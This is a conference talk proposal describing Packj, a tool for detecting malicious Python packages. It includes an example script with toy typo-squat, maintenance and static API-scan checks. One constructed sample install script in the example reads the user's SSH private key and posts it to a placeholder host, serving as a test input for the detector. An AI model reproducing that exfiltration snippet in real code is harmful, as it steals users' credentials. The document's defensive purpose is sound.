Blocking malicious/risky Python packages using Packj

shivaabhishek07

Description:

This talk presents an open-source Python tool, called Packj, for developers and security researchers to detect and report malicious/vulnerable Python packages. Packj started as an academic research project and carries out deep code as well as metadata analyses to detect supply-chain threats.

For instance, it scans package metadata (e.g., the README and package description) to determine whether a package is a dummy, typo-squatted or troll package. It flags unmaintained or deprecated packages by checking the version history and the time gaps between releases. Packages with no publicly available source code repository, or whose maintainers have not enabled two-factor authentication (2FA), are marked as risky. Finally, it performs static code analysis and install-time filesystem/network sandboxing to detect and block suspicious programmatic behaviour, such as the use of sensitive file system and network APIs, which are typically abused to exfiltrate private data.
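To make the checks above concrete, here is an added example (not Packj's own code; Packj's real API lists, thresholds and heuristics differ) that implements toy versions of three of them in Python: a typo-squat check against a constructed list of popular names, an unmaintained-package check over a constructed release history, and an ast-based static scan for calls to sensitive file system and network APIs in a constructed install-time script. The package names, dates, API allowlist and sample script are all constructed for illustration.

```python
"""Toy supply-chain vetting checks in the spirit of the analyses described above.

Added example, not Packj's code. Every input below is constructed.
"""
import ast
from datetime import date

# Constructed "popular" package list; a real checker would derive this from download stats.
POPULAR = {"requests", "numpy", "urllib3", "cryptography", "colorama"}

# Constructed list of dotted call names treated as sensitive (illustrative, not Packj's list).
SENSITIVE_APIS = {
    "os.system", "subprocess.Popen", "subprocess.run", "socket.socket",
    "urllib.request.urlopen", "requests.post", "requests.get",
    "exec", "eval", "open", "os.environ.get",
}


def edit_distance(a: str, b: str) -> int:
    """Optimal-string-alignment distance: insert, delete, substitute, adjacent transpose."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = a[i - 1] != b[j - 1]
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            # Typo-squats are often a swapped pair of letters, so count that as one edit.
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[-1][-1]


def typosquat_candidates(name: str, popular=POPULAR, max_distance: int = 1):
    """Popular names within max_distance edits of `name`, excluding an exact match."""
    return sorted(p for p in popular if p != name and edit_distance(name, p) <= max_distance)


def maintenance_flags(release_dates, today: date, max_gap_days: int = 365):
    """Flag a large gap between consecutive releases or a long silence since the last one."""
    dates = sorted(release_dates)
    flags = []
    gaps = [(b - a).days for a, b in zip(dates, dates[1:])]
    if gaps and max(gaps) > max_gap_days:
        flags.append(f"release gap of {max(gaps)} days")
    silence = (today - dates[-1]).days
    if silence > max_gap_days:
        flags.append(f"no release for {silence} days")
    return flags


def _dotted_name(node):
    """Turn the callee of `a.b.c(...)` into 'a.b.c'; None if it is not a plain name chain."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def sensitive_api_calls(source: str):
    """Static pass: (line, dotted name) for every call whose callee is in SENSITIVE_APIS."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in SENSITIVE_APIS:
                hits.append((node.lineno, name))
    return sorted(hits)


def assess(name, release_dates, source, today, repo_url=None, maintainer_2fa=True):
    """Combine the checks into a list of human-readable risk strings."""
    risks = [f"possible typo-squat of {p}" for p in typosquat_candidates(name)]
    risks += maintenance_flags(release_dates, today)
    if not repo_url:
        risks.append("no public source repository")
    if not maintainer_2fa:
        risks.append("maintainer account without 2FA")
    risks += [f"sensitive API {api} at line {ln}" for ln, api in sensitive_api_calls(source)]
    return risks


# Constructed install-time script: reads an SSH private key and posts it to a remote host.
SAMPLE_SETUP = """\
import os, urllib.request
key = open(os.path.expanduser('~/.ssh/id_rsa')).read()
urllib.request.urlopen('http://example.invalid/collect', data=key.encode())
"""


def demo_assessment():
    """Run assess() over the constructed package; returned (not printed) so it can be checked."""
    return assess("reqeusts", [date(2019, 1, 10), date(2019, 2, 1), date(2021, 3, 5)],
                  SAMPLE_SETUP, today=date(2023, 9, 1), repo_url=None, maintainer_2fa=False)


if __name__ == "__main__":
    for risk in demo_assessment():
        print("RISK:", risk)
```

The static scan only catches calls it can name in the syntax tree: an attacker who resolves the function through `getattr`, or who decodes and `exec`s a base64 blob, hides the real call from this pass. That blind spot is exactly why the description pairs static analysis with install-time filesystem and network sandboxing, where the exfiltration is observed as it happens regardless of how the code that performs it was written.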

Packj is available as a standalone CLI tool and also supports CI/CD integration. We have built a large-scale automated system for continuous vetting of packages using Packj, and have already identified several malicious packages. In this talk, we will present the technical details, highlight our findings as well as the different types of attacks we observed, and demo our tool.

Prerequisites:

No prerequisites are required, but a basic understanding of Python is helpful.

Content URLs:

https://github.com/ossillate-inc/packj

Speaker Info:

Speaker: Shiva is a software intern at Ossillate Inc and an undergraduate student pursuing a Bachelor of Technology in Computer Science. He is passionate about technology and new trends in the software industry. He is interested in DevSecOps, open source, and building things that are helpful for others. Most recently, Shiva has been contributing to Packj, an open-source tool to mitigate software supply-chain attacks.

Co-speaker: Ashish is a published author and researcher with a PhD in Computer Science from the Georgia Institute of Technology and extensive experience in building secure systems software from the ground up. He has worked in the industry for over a decade, coupled with nearly a decade of top-tier academic research. Ashish has presented his work at top-tier academic conferences, such as USENIX ATC, ACM SIGMETRICS, NDSS, and CSS. He also speaks frequently at premier industry conferences, such as Open Source Summit, PyCon, Linux Plumbers Conference, Black Hat, and PackagingCon.

Speaker Links:

Speaker: LinkedIn: https://www.linkedin.com/in/shivaabhishek71/ Twitter(X): https://twitter.com/shivaabhishek71

Co-speaker: LinkedIn: https://www.linkedin.com/in/ashishbijlani/ Twitter(X): https://twitter.com/ashishbijlani

Section: Networking and Security
Type: Talks
Target Audience: Beginner